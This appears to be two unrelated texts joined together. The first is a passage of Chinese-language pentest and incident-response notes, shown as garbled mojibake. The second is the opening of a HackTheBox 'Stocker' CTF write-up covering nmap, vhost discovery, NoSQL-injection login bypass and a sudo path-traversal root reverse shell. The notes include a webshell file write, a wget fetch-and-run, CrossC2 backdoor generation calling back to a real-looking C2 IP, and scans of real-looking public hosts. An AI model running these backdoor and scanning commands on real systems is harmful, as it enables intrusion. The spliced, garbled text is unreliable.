ๅ…ฅๅˆฐ่‡ชๅทฑ็š„ๅŽ้—จๅœฐๅ€ไธญ ๅฏไปฅๅˆฉ็”จfile_put_contents('xiaodi.txt','xigua')ๅ†™ๆ–‡ไปถๅˆฐๅฏนๆ–นๆœฌ็บง็›ฎๅฝ•๏ผŒๅŒๆ ท้œ€่ฆbase64็ผ–็  ็”š่‡ณๅฏไปฅ่‡ชๅทฑ็ผ–ๅ†™python่„šๆœฌ๏ผŒๅŽปๅฎž็Žฐๆ–‡ไปถๆต่งˆ็š„ๅŠŸ่ƒฝ ### 32.snetcrackerๅณ่ถ…็บงๅผฑๅฃไปคๅทฅๅ…ท็š„ๅฎ‰่ฃ…ๅ’Œไฝฟ็”จ๏ผŸๅ่ฎฎๅผฑๅฃไปค่‡ชๆŸฅใ€‚ ๅœจwindowsไธŠๅฏไปฅๆญฃๅธธไฝฟ็”จ๏ผŒไฝฟ็”จๆ—ถๆ นๆฎ้œ€่ฆ้€‰ๆ‹ฉๆ˜ฏๅฆๆทปๅŠ ๆ–ฐ็š„ๅญ—ๅ…ธ๏ผŒๆˆ–่€…ๆ–ฐ็š„ๅฏ†็ ๏ผŒ้€‰ๆ‹ฉๆ˜ฏๅฆๅช็”จไธ€ไธช่ดฆๆˆท ๅœจmacไธŠpdไธญๆœ‰้—ฎ้ข˜๏ผŒๆฒกๆœ‰่งฃๅ†ณ ChilkatDotNet4.dll ๆœ‰ๆŠฅ้”™ๆœช่ƒฝๅŠ ่ฝฝ ๆญคๆฌพๅทฅๅ…ทไธป่ฆ้’ˆๅฏน้žwebๅ่ฎฎ็š„ๅผฑๅฃไปคๆšดๅŠ›็ ด่งฃ๏ผŒๆ˜ฏๅฏ่ง†ๅŒ–้‡Œ่พน็ˆ†็ ดๆœๅŠกๅทฅๅ…ท ### 33.ๆœๅŠก่‡ชๆŸฅๅทฅๅ…ท๏ผŸ linux๏ผšhttps://github.com/rebootuser/LinEnum ๅฏไปฅๆŸฅ็œ‹ๅˆฐๅฝ“ๅ‰linuxๆœบๅ™จไธŠ็š„ๅพˆๅคš็›ธๅ…ณไฟกๆฏ windows๏ผšGet-WmiObject -class Win32_Product ๅฏไปฅ็›ดๆŽฅๆ‰พๅˆฐไธปๆœบไธญๅญ˜ๅœจ็š„ๆœๅŠก๏ผŒ้…ๅˆsearchexploit่ฟ›่กŒๆผๆดž็š„ๅˆฉ็”จๅŠๅค็Žฐ ###### ๅบ”ๆ€ฅๅ“ๅบ”ๆœ‰ๅ“ชไบ›ๅทฅๅ…ทๅ€ผๅพ—ไฝฟ็”จ๏ผŸ https://github.com/diogo-fernan/ir-rescue ๆ˜ฏๅบ”ๆ€ฅๅ“ๅบ”็š„ๅ†›็ซๅบ“๏ผŒ้›†ๆˆไบ†ๅคง้‡็š„ๅทฅๅ…ทๅฏไพ›ไฝฟ็”จ windows: TCPview๏ผŒProcess Exploer๏ผŒPChunter๏ผŒUserAssitView.exe,autoruns ๆŸฅ็œ‹็›ธๅ…ณ่ฟ›็จ‹ๆœๅŠก็ซฏๅฃไปปๅŠก่ฎกๅˆ’ๅฏๅŠจ้กน็ญ‰ linux: GScan,LinEnum,linuxprivchecker ๆŸฅ็œ‹ๆœๅŠกๅ™จ็›ธๅ…ณไฟกๆฏ๏ผŒๆ˜ฏๅฆๆœ‰ๆผๆดž๏ผŒ่ฟ›่กŒ่‡ชๅŠจๆ‰ซๆ ###### linuxๆผๆดžๆ”ถ้›†๏ผš LinEnum.sh/linuxprivcheckerๆ”ถ้›†็‰นๅฎšไฟกๆฏ๏ผŒไธบๅŽ็ปญๆๆƒๅšๅ‡†ๅค‡ ./LinEnum.sh python3 -m pip install --user --upgrade pip==20.3.4 && pip install linuxprivchecker &&python3 -m linuxprivchecker -w -o linuxprivchecker.log wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh && ./les.sh perl linux-exploit-suggester-2.pl ###### windowsๆผๆดžๆ”ถ้›†๏ผš https://github.com/bitsadmin/wesng systeminfo > 1.txt ้œ€่ฆๆๅ‰้€š่ฟ‡webshellๆ‹ฟๅˆฐๅฏนๆ–น็š„systeminfoไฟกๆฏๅฏนๆฏ” python wes.py 1.txt -o vuln.c https://github.com/chroblert/WindowsVulnScan pip install requests -i http://pypi.douban.com/simple --trusted-host=pypi.douban.com PS:.\KBcontroller.ps1 cmd:python cve-check.py -C -f KB.json ###### ไป€ไนˆๆ˜ฏๅ‹’็ดข็—…ๆฏ’๏ผŸ ๅ‹’็ดข็—…ๆฏ’๏ผŒๆ˜ฏไธ€็งๆ–ฐๅž‹็”ต่„‘็—…ๆฏ’๏ผŒไธป่ฆไปฅ้‚ฎไปถใ€็จ‹ๅบๆœจ้ฉฌใ€็ฝ‘้กตๆŒ‚้ฉฌ็š„ๅฝขๅผ่ฟ›่กŒไผ ๆ’ญใ€‚ ่ฏฅ็—…ๆฏ’ๆ€ง่ดจๆถๅŠฃใ€ๅฑๅฎณๆžๅคง๏ผŒไธ€ๆ—ฆๆ„ŸๆŸ“ๅฐ†็ป™็”จๆˆทๅธฆๆฅๆ— ๆณ•ไผฐ้‡็š„ๆŸๅคฑใ€‚ ่ฟ™็ง็—…ๆฏ’ๅˆฉ็”จๅ„็งๅŠ ๅฏ†็ฎ—ๆณ•ๅฏนๆ–‡ไปถ่ฟ›่กŒๅŠ ๅฏ†๏ผŒ่ขซๆ„ŸๆŸ“่€…ไธ€่ˆฌๆ— ๆณ•่งฃๅฏ†๏ผŒๅฟ…้กปๆ‹ฟๅˆฐ่งฃๅฏ†็š„็ง้’ฅๆ‰ๆœ‰ๅฏ่ƒฝ็ ด่งฃ lesuobingdu.360.cn๏ผŒhttps://www.nomoreransom.org/zh/index.html ็ญ‰ๅฏ่ฟ›่กŒ่งฃๅฏ†ๅ‹’็ดข๏ผŒๅˆ†ๆž็—…ๆฏ’ ไธญไบ†ๅ‹’็ดข็—…ๆฏ’ไน‹ๅŽ๏ผŒ็”ต่„‘ๆ‰€ๆœ‰็š„ๆ–‡ไปถ้ƒฝ่ขซๅŠ ๅฏ†๏ผŒๆ— ๆณ•ไฝฟ็”จ ###### ๅฆ‚ไฝ•้˜ฒ่Œƒๅ‹’็ดข็—…ๆฏ’๏ผŸ ๆŸฅ็œ‹ๅฎ˜ๆ–น็ป™็š„่กฅไธ๏ผŒๅŠๆ—ถๆ‰“่กฅไธ๏ผŒไธไธ‹่ฝฝๆถๆ„็จ‹ๅบ ๅ‹’็ดข็—…ๆฏ’็š„ไผ ่พ“ไธป่ฆๆ˜ฏไธ็ปๆ„้—ดไธ‹่ฝฝไบ†ๆŸไบ›็จ‹ๅบ ### 34.ๅบ”ๆ€ฅๅ“ๅบ”็š„ๆญฅ้ชค๏ผš ไฟๆŠค้˜ถๆฎต๏ผšไธป่ฆๆ˜ฏๆ–ญ็ฝ‘๏ผŒ้˜ฒๆญขๅฏนๆ–น็š„็ปง็ปญๆธ—้€ ๅˆ†ๆž้˜ถๆฎต๏ผš้€š่ฟ‡็ป™ๅ‡บ็š„ๆ—ถ้—ดๆฅๅˆ†ๆžๆ—ฅๅฟ—ไฟกๆฏ๏ผŒๅˆคๆ–ญๅฏนๆ–น็š„ๆ”ปๅ‡ป่กŒไธบ ๅค็Žฐ้˜ถๆฎต๏ผšๅค็Žฐๅฏนๆ–น็š„ๆ”ปๅ‡ป๏ผŒๅฏนๆ–นๅˆฐๅบ•ๆ˜ฏๆ€Žๆ ทๅฐ†ๆ•ฐๆฎไผ ่พ“ๅˆฐๆœๅŠกๅ™จ็š„๏ผŒๅˆฉ็”จไบ†ๅ“ชไธชๆผๆดž ไฟฎๅค้˜ถๆฎต๏ผšๆ‰“ไธŠๅˆ้€‚็š„่กฅไธ๏ผŒๆˆ–่€…ไฟฎๆ”น็›ธๅ…ณ้…็ฝฎๆ–‡ไปถ๏ผŒ้ƒจ็ฝฒWAF็ญ‰ๆ“ไฝœ ๅปบ่ฎฎ้˜ถๆฎต๏ผšๆ€Žไนˆ่ƒฝๆœ‰ๆ•ˆ็š„้˜ฒๆญขไธ‹ๆฌก็š„ๆ”ปๅ‡ป ###### ๆ€Žไนˆๅฏปๆ‰พๆ—ฅๅฟ—็š„ๅญ˜ๅ‚จ่ทฏๅพ„๏ผŸ ไธ€่ˆฌๅฏนๆ–น็š„ๆœๅŠกๅ™จ้ป˜่ฎคไผšๅผ€ๅฏ๏ผŒไธ่ฎบๆ˜ฏๅฎๅก”่ฟ˜ๆ˜ฏmysql๏ผŒ้ƒฝไผšๆœ‰ๅญ˜ๅ‚จ ้€š่ฟ‡้…็ฝฎๆ–‡ไปถๆˆ–่€…ๅŒ…ๅซๆ–‡ไปถๅŽปๆŸฅๅˆฐ่ฟ™ไธชๆ–‡ไปถ็›ฎๅฝ•๏ผŒ็„ถๅŽๅฏนๆ—ฅๅฟ—่ฟ›่กŒๅˆ†ๆž ###### ๅˆ†ๆžsqlๆณจๅ…ฅๆœ‰ไป€ไนˆๆŠ€ๅทง๏ผŸSQLๆณจๅ…ฅๆœ‰ๅ“ชไบ›ๅฑๅฎณ๏ผŸ ๅฏไปฅๅˆ†ๆž็›ธๅ…ณ็š„ๅ…ณ้”ฎๅญ—ๅœจๆ—ฅๅฟ—ๆ–‡ไปถไธญๅ…จๅฑ€ๆœ็ดข๏ผŒๅฆ‚select๏ผŒinsert๏ผŒsqlmap๏ผŒpwd ๆˆ–่€…ๅฏนๆ–น้—็•™ๅœจwebไธŠ็š„ๅŽ้—จๆ–‡ไปถไธญ็š„็‰นๆฎŠๅ‘ฝๅ๏ผŒไปฅๅŠๅŽ้—จไธญ็š„ไธ€ไบ›ๅ…ณ้”ฎไฟกๆฏ๏ผŒไปฅๅŠๅฏนๆ–น็š„IP ๅฐ†ๅฏนๆ–นๅœจไป€ไนˆๆ—ถๅ€™ๅนฒไบ†ไป€ไนˆไบ‹๏ผŒไปฅไฝ•็งๆ–นๅผ่พพๅˆฐ็š„็›ฎ็š„๏ผŒๅˆฉ็”จไบ†ๅ“ชไบ›ๆผๆดž้ƒฝๅˆ†ๆžๅ‡บๆฅ ๅฏนๆ–น้€š่ฟ‡sqlๆณจๅ…ฅไธไป…ๅฏไปฅๅผฑๅฃไปค๏ผŒsqlๆณจๅ…ฅ๏ผŒๆๅ‡ๆƒ้™๏ผŒ็ชƒๅ–ๅค‡ไปฝ๏ผŒ ่€Œไธ”ๅฝ“ๅ…ถๆƒ้™ๆ้ซ˜ๅˆฐๆœๅŠกๅ™จๆƒ้™ๆ—ถ๏ผŒ็”š่‡ณๅฏไปฅๅˆ ้™คๆœๅŠกๅ™จ็š„ๆ—ฅๅฟ— ้œ€่ฆ็กฎๅฎšsqlๆ—ฅๅฟ—ๆ˜ฏๅฆไธบๅผ€ๅฏ็Šถๆ€๏ผŒๅˆ†ๆžๆ—ถๅฏไปฅ้€š่ฟ‡ๅฝ“ไธชๆ—ฅๅฟ—ไบบไธบๅˆ†ๆž๏ผŒไนŸๅฏๅ€ŸๅŠฉๅ…ถไป–ๅทฅๅ…ท ###### ๆ—ฅๅฟ—ๅˆ†ๆž็š„ๅทฅๅ…ทๆœ‰ๅ“ชไบ›๏ผŸๅฆ‚ไฝ•ๆฃ€ๆต‹่‡ชๅทฑ็š„ๆœๅŠกๅ™จไธŠๆœ‰ๆฒกๆœ‰payload๏ผŸ ๅคงๆ•ฐๆฎๅˆ†ๆžๅนณๅฐELKๅ’Œspunk๏ผŒๅ‰่€…ๅฏไปฅ็›ดๆŽฅ็”จdocker่ฟ›่กŒๆญๅปบ ็”จ360ๆ˜Ÿๅ›พๅฏไปฅๅ›พๅฝขๅŒ–็š„ๅˆ†ๆžไธ€ไบ›็ฎ€ๅ•็š„ๆ—ฅๅฟ— windowsไธŠ็š„ๆ—ฅๅฟ—็”จfileseekๅฏไปฅๆ‰น้‡่ฟ›่กŒๆœ็ดขๆŸฅ่ฏข logfusionๅฏไปฅๅˆ†ๆžไธ€ไบ›็ฝ‘็ซ™ๆœๅŠกๅ™จๆˆ–ๆ—ฅๅฟ—็š„ไฟกๆฏ๏ผŒๅˆคๆ–ญไป€ไนˆๆ—ถๅ€™่ขซ็ˆ†็ ด๏ผŒ่ฟ›่กŒ่ฟฝๆœ” ###### ็ญ›้€‰ๅˆฐไบ†ๆผๆดžไน‹ๅŽๅฆ‚ไฝ•้˜ฒๆŠค๏ผŸ ๅฐ่ฏ•่ทŸ้šๆ”ปๅ‡ป่€…็š„exp่ฟ›่กŒๅค็Žฐ๏ผŒๆœ็ดข็›ธๅ…ณ่กฅไธๆˆ–่€…่ฝฌ็งป็ซฏๅฃ๏ผŒๅผ€ๅฏๆ›ดๅคš็š„WAF่ง„ๅˆ™็ญ‰ ๆ—ฅๅฟ—่ขซๅˆ ้™คไบ†ๆœ‰ไป€ไนˆๅŠžๆณ•ๆขๅคๆ—ฅๅฟ—ไฟกๆฏ๏ผŸๆ—ฅๅฟ—่ขซๅˆ ้™คไธ”ๆ— ๆณ•ๆขๅค็š„ๆƒ…ๅ†ตไธ‹ๅบ”่ฏฅๆ€Žไนˆๅšๅบ”ๆ€ฅๅค„็†๏ผŸ ้ ่‡ชๅทฑ็š„ๅŠžๆณ•ๆ˜ฏๆฒกๆœ‰ๅŠžๆณ•ๆขๅค็š„๏ผŒ้œ€่ฆๅŽปๆ‰พไธ€ไบ›ๆ”ถ่ดน็š„ไบงๅ“ๆขๅคๆ—ฅๅฟ—๏ผŒๅฆ‚ๆžœๆฒกๆœ‰ๆ—ฅๅฟ—๏ผŒๅˆ™้œ€่ฆไปŽ็บข้˜Ÿ็š„่ง’ๅบฆๅ‡บๅ‘๏ผŒๆŸฅ็œ‹่‡ชๅทฑๆœๅŠกๅ™จ็š„ๆผๆดž ๆŸฅ็œ‹่‡ชๅทฑๆœๅŠกๅ™จๆœ‰ๅ“ชไบ›ๅฏไปฅๅˆฉ็”จ็š„exp๏ผŒๅนถไธ€ไธ€ๅŽป้ชŒ่ฏ่ฟ™ไบ›ๆผๆดž็š„็œŸๅฎžๅญ˜ๅœจๆ€ง ### 35.Linux-grep ็ญ›้€‰๏ผš ็ปŸ่ฎกไบ†ไธ‹ๆ—ฅๅฟ—๏ผŒ็กฎ่ฎคๆœๅŠกๅ™จ้ญๅ—ๅคšๅฐ‘ๆฌกๆšดๅŠ›็ ด่งฃ grep -o "Failed password" /var/log/secure|uniq -c ่พ“ๅ‡บ็™ปๅฝ•็ˆ†็ ด็š„็ฌฌไธ€่กŒๅ’Œๆœ€ๅŽไธ€่กŒ๏ผŒ็กฎ่ฎค็ˆ†็ ดๆ—ถ้—ด่Œƒๅ›ด๏ผš grep "Failed password" /var/log/secure|head -1 grep "Failed password" /var/log/secure|tail -1 ่ฟ›ไธ€ๆญฅๅฎšไฝๆœ‰ๅ“ชไบ› IP ๅœจ็ˆ†็ ด๏ผŸ grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9[0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr ็ˆ†็ ด็”จๆˆทๅๅญ—ๅ…ธ้ƒฝๆœ‰ๅ“ชไบ›๏ผŸ grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr ็™ปๅฝ•ๆˆๅŠŸ็š„ๆ—ฅๆœŸใ€็”จๆˆทๅใ€ IP๏ผš grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more ###### linuxๆœๅŠกๅ™จๆ€Žไนˆ่ตฐ่‡ชๅทฑ็š„ไปฃ็†๏ผŸ ๆ นๆฎๆฉ˜ๅญไบ‘ๅฎ˜ๆ–น็š„้…็ฝฎๆ–‡ไปถ๏ผŒๅฐ†่‡ชๅทฑ็š„clash่ฎข้˜…้“พๆŽฅๆ‹ฟๅˆฐ๏ผŒๅนถไธ”ๅฏๅŠจclash export https_proxy="socks5://127.0.0.1:7890" && export http_proxy="http://127.0.0.1:7890" curl -vv www.google.comๆฃ€้ชŒ่‡ชๅทฑๆ˜ฏๅฆ่ƒฝไธŠๅค–็ฝ‘ linuxๆœบๅ™จๅœจcsไธญไธŠ็บฟ๏ผš linux ๅ€ŸๅŠฉ CrossC2 ้กน็›ฎ๏ผš netstat -ntulp https://github.com/gloxec/CrossC2 ๅ‚่€ƒ่ฟ‡็จ‹๏ผš http://www.adminxe.com/1287.html ้กน็›ฎไธŠไผ ่‡ณๆœๅŠก็ซฏ็›ฎๅฝ•๏ผŒ็ป™ไบˆๆ‰ง่กŒๆƒ้™ ้…็ฝฎ็›‘ๅฌๅ™จ๏ผš windows/beacon_https/reverse_https ็ซฏๅฃๆ”พ่กŒ ็”ŸๆˆๅŽ้—จ๏ผš./genCrossC2.Linux 110.42.178.227 5566 null null Linux x64 C2 ้€š่ฟ‡็ฝ‘็ปœ็›‘ๅฌๅทฅๅ…ทๅŠ windows ๆ—ฅๅฟ—ๅˆ†ๆžๆˆ–ๆ‰ง่กŒ่ฎฐๅฝ•ๆŸฅๆ‰พๅŽ้—จ้—ฎ้ข˜ ### 36.ๆ นๆฎ็ซฏๅฃๆŸฅๆœๅŠก๏ผš linux๏ผšnetstat -tunlp | grep 5000 windows๏ผšnetstat -aon | findstr "็ซฏๅฃๅท" tasklist|findstr "PID" ###### ่ฟ›็จ‹ๅ’Œ็บฟ็จ‹็š„ๅŒบๅˆซ๏ผš ๅšไธช็ฎ€ๅ•็š„ๆฏ”ๅ–ป๏ผš่ฟ›็จ‹=็ซ่ฝฆ๏ผŒ็บฟ็จ‹=่ฝฆๅŽข ็บฟ็จ‹ๅœจ่ฟ›็จ‹ไธ‹่กŒ่ฟ›๏ผˆๅ•็บฏ็š„่ฝฆๅŽขๆ— ๆณ•่ฟ่กŒ๏ผ‰ ไธ€ไธช่ฟ›็จ‹ๅฏไปฅๅŒ…ๅซๅคšไธช็บฟ็จ‹๏ผˆไธ€่พ†็ซ่ฝฆๅฏไปฅๆœ‰ๅคšไธช่ฝฆๅŽข๏ผ‰ ไธๅŒ่ฟ›็จ‹้—ดๆ•ฐๆฎๅพˆ้šพๅ…ฑไบซ๏ผˆไธ€่พ†็ซ่ฝฆไธŠ็š„ไน˜ๅฎขๅพˆ้šพๆขๅˆฐๅฆๅค–ไธ€่พ†็ซ่ฝฆ๏ผŒๆฏ”ๅฆ‚็ซ™็‚นๆขไน˜๏ผ‰ ๅŒไธ€่ฟ›็จ‹ไธ‹ไธๅŒ็บฟ็จ‹้—ดๆ•ฐๆฎๅพˆๆ˜“ๅ…ฑไบซ๏ผˆA่ฝฆๅŽขๆขๅˆฐB่ฝฆๅŽขๅพˆๅฎนๆ˜“๏ผ‰ ่ฟ›็จ‹่ฆๆฏ”็บฟ็จ‹ๆถˆ่€—ๆ›ดๅคš็š„่ฎก็ฎ—ๆœบ่ต„ๆบ๏ผˆ้‡‡็”จๅคšๅˆ—็ซ่ฝฆ็›ธๆฏ”ๅคšไธช่ฝฆๅŽขๆ›ด่€—่ต„ๆบ๏ผ‰ ่ฟ›็จ‹้—ดไธไผš็›ธไบ’ๅฝฑๅ“๏ผŒไธ€ไธช็บฟ็จ‹ๆŒ‚ๆŽ‰ๅฐ†ๅฏผ่‡ดๆ•ดไธช่ฟ›็จ‹ๆŒ‚ๆŽ‰๏ผˆไธ€ๅˆ—็ซ่ฝฆไธไผšๅฝฑๅ“ๅˆฐๅฆๅค–ไธ€ๅˆ—็ซ่ฝฆ๏ผŒไฝ†ๆ˜ฏๅฆ‚ๆžœไธ€ๅˆ—็ซ่ฝฆไธŠไธญ้—ด็š„ไธ€่Š‚่ฝฆๅŽข็€็ซไบ†๏ผŒๅฐ†ๅฝฑๅ“ๅˆฐๆ‰€ๆœ‰่ฝฆๅŽข๏ผ‰ ่ฟ›็จ‹ๅฏไปฅๆ‹“ๅฑ•ๅˆฐๅคšๆœบ๏ผŒ่ฟ›็จ‹ๆœ€ๅคš้€‚ๅˆๅคšๆ ธ๏ผˆไธๅŒ็ซ่ฝฆๅฏไปฅๅผ€ๅœจๅคšไธช่ฝจ้“ไธŠ๏ผŒๅŒไธ€็ซ่ฝฆ็š„่ฝฆๅŽขไธ่ƒฝๅœจ่กŒ่ฟ›็š„ไธๅŒ็š„่ฝจ้“ไธŠ๏ผ‰ ่ฟ›็จ‹ไฝฟ็”จ็š„ๅ†…ๅญ˜ๅœฐๅ€ๅฏไปฅไธŠ้”๏ผŒๅณไธ€ไธช็บฟ็จ‹ไฝฟ็”จๆŸไบ›ๅ…ฑไบซๅ†…ๅญ˜ๆ—ถ๏ผŒๅ…ถไป–็บฟ็จ‹ๅฟ…้กป็ญ‰ๅฎƒ็ป“ๆŸ๏ผŒๆ‰่ƒฝไฝฟ็”จ่ฟ™ไธ€ๅ—ๅ†…ๅญ˜ใ€‚๏ผˆๆฏ”ๅฆ‚็ซ่ฝฆไธŠ็š„ๆด—ๆ‰‹้—ด๏ผ‰๏ผ"ไบ’ๆ–ฅ้”" ่ฟ›็จ‹ไฝฟ็”จ็š„ๅ†…ๅญ˜ๅœฐๅ€ๅฏไปฅ้™ๅฎšไฝฟ็”จ้‡๏ผˆๆฏ”ๅฆ‚็ซ่ฝฆไธŠ็š„้คๅŽ…๏ผŒๆœ€ๅคšๅชๅ…่ฎธๅคšๅฐ‘ไบบ่ฟ›ๅ…ฅ๏ผŒๅฆ‚ๆžœๆปกไบ†้œ€่ฆๅœจ้—จๅฃ็ญ‰๏ผŒ็ญ‰ๆœ‰ไบบๅ‡บๆฅไบ†ๆ‰่ƒฝ่ฟ›ๅŽป๏ผ‰๏ผโ€œไฟกๅท้‡โ€ ### 36.ๆ นๆฎpocsuiteๆŒ‡ๅฎš่‡ชๅทฑ็š„่„šๆœฌ่ฟ›่กŒๆต‹่ฏ•๏ผŒๅˆคๆ–ญๆœ‰ๆฒกๆœ‰ๆญคๆผๆดž๏ผŒ่ฟ›่กŒๆผๆดž้ชŒ่ฏ ``` python cli.py -u http://42.200.64.221:4848/ -r weblogic_selef.py --verify ๆ นๆฎๅฏ่ƒฝๆณจๅ…ฅ็š„sqlๆณจๅ…ฅ็‚น๏ผŒ่ฟ›่กŒsqlmap็š„ๆ‰น้‡ๆต‹่ฏ• python sqlmapapi.py -s python sqlmapapi1.py ``` id -> root(0) -> ็จ‹ๅบ็”จๆˆท(1~499) -> ๆ™ฎ้€š็”จๆˆท(500~65545) winๅ‘ฝไปค -> net user -> netstat start -> netstat -an -> whoami -> id -> tasklist /svc -> type ๅฎ‰ๅ“ๆต‹่ฏ• -> ๆŠ“ๅŒ… + ๅ็ผ–่ฏ‘ + ๆๅ–url IPๆ‰ซๆ -> ๅŸŸๅ็ซ™็‚นๅพ€ๅพ€ๆฏ”IP็ซ™็‚น็š„่งฃๆžๅฐ‘ไธ€็บง -> ipๆ‰ซๆๆบ็ ๅค‡ไปฝๅฏ่ƒฝๆ€ง้ซ˜ไธ€ไบ› ไฟกๆฏๆ”ถ้›† -> ็›ฎๅฝ•ๅž‹็ฝ‘็ซ™ใ€็ซฏๅฃ็ฑป็ฝ‘็ซ™ใ€ๅญๅŸŸๅ็ฝ‘็ซ™ใ€ๅŒ็ฑปๅ…ฌๅธ็ฝ‘็ซ™ใ€whoisๆŸฅ่ฏขใ€็ฌฌไธ‰ๆ–นๆŽฅๅฃๆˆ–็•Œ้ข cmsๆŸฅ่ฏข -> python cmseek.py -u http://1.117.52.219:8000 ๅญๅŸŸๅๆŸฅ่ฏข -> python3 oneforall.py --target chentuo.asia run ๆบ็ ๆณ„ๆผ -> windows chentuo.asia.zip ๆˆ–rar / linux chentuo.asia.tar.gz ๆ‰ซๆ็›ฎๅฝ• .gitๆณ„ๆผ -> python2 Githack.py http://chentuo.asia/.git/ .svnๆณ„ๆผ -> ็›ฎๅฝ•็ฝ‘็ซ™.svnๅฆ‚ๆœ‰่ต„ๆบ,python3 SvnExploit.py -u http:/127.0.0.1/.svn --dump web.xmlๆณ„ๆผ -> WEB-INF/classes/cn/abc/servlet/DownloadServlet.class ไธ‹่ฝฝๆ–‡ไปถไธ€่ˆฌๆ˜ฏpostๆ–นๅผ githubๆœ็ดข -> ๅœจๆบ็ ไธญๅ‘็Žฐๆ•ๆ„Ÿ็š„qqๆˆ–่€…่บซไปฝไฟกๆฏ๏ผŒๅˆฉ็”จgithub่ฟ›่กŒๆœ็ดข่Žทๅ–ๆ•ๆ„Ÿไปฃ็  waf่ฏ†ๅˆซ -> python3 wafw00f/main.py http://www.chentuo.asia ๆ—ๆณจๆŸฅ็ฝ‘็ซ™ -> ๅŒไธ€ipไธๅŒ็ฝ‘ๅ€ https://webscan.cc/site_xyh.sdju.edu.cn/ CๆฎตๆŸฅ็ฝ‘็ซ™ -> ๅŒไธ€็ฝ‘ๆฎตไธๅŒip https://chapangzhan.com/210.35.68.0/24 ipๅๆŸฅ -> ๅˆฉ็”จip่Žทๅ–ๆœๅŠกๅ™จ่งฃๆžๅŸŸๅ cdnๆŸฅ่ฏข -> nslookup ๏ผŒhttp://17ce.com/๏ผŒhttps://www.wepcc.com/web.html ๏ผŒๆƒ…ๆŠฅ็คพๅŒบๆŸฅๅŽ†ๅฒ่งฃๆž cdn็ป•่ฟ‡ -> ๅญๅŸŸๅ๏ผŒๅŽปๆŽ‰www๏ผŒ้‚ฎไปถๆœๅŠกๅ™จ๏ผŒๅ›ฝๅค–่ฎฟ้—ฎ๏ผŒAPPๆŠ“ๅŒ…๏ผŒไฟฎๆ”นhosts๏ผŒ็›ธๅ…ณๆผๆดž๏ผŒๆ‰ซๅ…จ็ฝ‘๏ผŒfuckcdn arlไฟกๆฏๆ”ถ้›† -> https://110.42.178.227:5003/
# Stocker - HackTheBox - Writeup Linux, 20 Base Points, Easy ![info.JPG](images/info.JPG) ## Machine ![Stocker.JPG](images/Stocker.JPG) ## TL;DR To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `80`. ***User***: Discovered the virtual host `dev.stocker.htb` and successfully bypassed authentication using NoSQL injection. Located a PDF file created with `Skia/PDF m108` and successfully injected HTML into the generated PDF. Read the local file `index.js` by obtaining the password of the `angoose` user. ***Root***: Executed `sudo -l` and discovered the ability to run `/usr/bin/node /usr/local/scripts/*.js` as `root`. Utilized this by running a reverse shell with sudo `/usr/bin/node /usr/local/scripts/../../../tmp/rev.js`, successfully obtaining a reverse shell as `root`. ![pwn.JPG](images/pwn.JPG) ## Stocker Solution ### User Let's begin by using `nmap` to scan the target machine: ```console โ”Œโ”€[evyatar9@parrot]โ”€[/hackthebox/Stocker] โ””โ”€โ”€โ•ผ $ nmap -sV -sC -oA nmap/Stocker 10.10.11.196 Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-03 14:52 IST Nmap scan report for 10.10.11.196 Host is up (0.078s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3d:12:97:1d:86:bc:16:16:83:60:8f:4f:06:e6:d5:4e (RSA) | 256 7c:4d:1a:78:68:ce:12:00:df:49:10:37:f9:ad:17:4f (ECDSA) |_ 256 dd:97:80:50:a5:ba:cd:7d:55:e8:27:ed:28:fd:aa:3b (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://stocker.htb |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Observing port `80` (http://stocker.htb), we see that the following web page is hosted: ![port80.JPG](images/port80.JPG) Initiated a virtual host scan using the tool `gobuster`: ```console โ”Œโ”€[evyatar9@parrot]โ”€[/hackthebox/Stocker] โ””โ”€โ”€โ•ผ $ gobuster vhost -u stocker.htb -w ./subdomains-top1milion.txt -o vhosts -t 80 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://stocker.htb [+] Method: GET [+] Threads: 80 [+] Wordlist: ./subdomains-top1milion.txt [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/02/03 14:58:22 Starting gobuster in VHOST enumeration mode =============================================================== Found: dev.stocker.htb (Status: 302) [Size: 28] ``` Discovered the virtual host `dev.stocker.htb` while scanning. Upon observing the URL http://dev.stocker.htb, the following web page was encountered: ![dev.JPG](images/dev.JPG) By intercepting the login request, the following content was obtained: ```HTTP POST /login HTTP/1.1 Host: dev.stocker.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://dev.stocker.htb/login Content-Type: application/x-www-form-urlencoded Content-Length: 29 Origin: http://dev.stocker.htb DNT: 1 Connection: close Cookie: connect.sid=s%3AtN-kXpz_f7SGn9BmNv4UXCAS9LlzwTFH.O%2F7ZQoR80qCnMZ%2FqU4sT8NFvVUBkTuLpV%2F5OuAKt6Jo Upgrade-Insecure-Requests: 1 username=admin&password=admin ``` Response: ```HTTP HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Feb 2023 13:22:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 92 Connection: close X-Powered-By: Express Location: /login?error=login-error Vary: Accept <p>Found. Redirecting to <a 